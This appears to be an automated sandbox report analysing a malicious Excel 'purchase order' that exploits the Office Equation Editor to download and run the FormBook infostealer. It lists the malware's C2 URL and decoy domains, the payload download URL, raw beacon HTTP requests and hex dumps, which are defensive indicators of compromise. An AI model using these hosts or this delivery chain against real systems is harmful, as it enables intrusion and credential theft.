Windows Analysis Report HME AG PO 2091.xlsx

AV Detection:

Found malware configuration

Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Multi AV Scanner detection for submitted file

Source: HME AG PO 2091.xlsx	Virustotal: Detection: 42%			Perma Link
Source: HME AG PO 2091.xlsx	ReversingLabs: Detection: 32%

Yara detected FormBook

Source: Yara match	File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://rfr.lt/ctf.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll	ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Roaming\word.exe	ReversingLabs: Detection: 41%

Machine Learning detection for sample

Source: HME AG PO 2091.xlsx

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\word.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.word.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.word.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.2abf840.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.word.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.word.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.word.exe.430000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.word.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.4d22e0.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: word.exe, word.exe, 00000005.00000002.519963830.0000000000980000.00000040.00000001.sdmp, word.exe, 00000005.00000003.460762852.0000000000230000.00000004.00000001.sdmp, word.exe, 00000005.00000002.520313707.0000000000B00000.00000040.00000001.sdmp, word.exe, 00000005.00000003.461783755.0000000000440000.00000004.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000002.674110480.00000000022E0000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.674256925.0000000002460000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.517708547.0000000001FF0000.00000004.00000001.sdmp
Source:	Binary string: cscript.pdbN source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
Source:	Binary string: cscript.pdb source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00405D7C FindFirstFileA,FindClose,		4_2_00405D7C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_004053AA
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00402630 FindFirstFileA,		4_2_00402630

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: rfr.lt

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.203.68.162:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.203.68.162:80

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ponto-bras.space
Source: C:\Windows\explorer.exe	Domain query: www.hydrogendatapower.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.rthearts.com/nk6l/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NANO-ASLV NANO-ASLV

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1Host: www.ponto-bras.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 23.227.38.74 23.227.38.74

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 14 Jan 2022 07:05:05 GMTContent-Type: application/octet-streamContent-Length: 248302Last-Modified: Thu, 13 Jan 2022 11:11:05 GMTConnection: keep-aliveETag: "61e008c9-3c9ee"Expires: Sun, 13 Feb 2022 07:05:05 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /ctf.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rfr.ltConnection: Keep-Alive

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Jan 2022 07:06:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Dc: gcp-europe-west1X-Request-ID: 99fb20a9-766c-40f0-9df4-b158c5fb1252X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd5059eac695c85-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

URLs found in memory or binary data

Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: word.exe, word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.507160581.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.673859564.0000000001CF0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.490190068.00000000077B8000.00000004.00000001.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469131172.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.479966015.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.488819431.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.507699566.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerK
Source: explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
Source: explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Downloads files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe

Jump to behavior

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: rfr.lt

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /ctf.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rfr.ltConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1Host: www.ponto-bras.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00404F61

E-Banking Fraud:

Yara detected FormBook

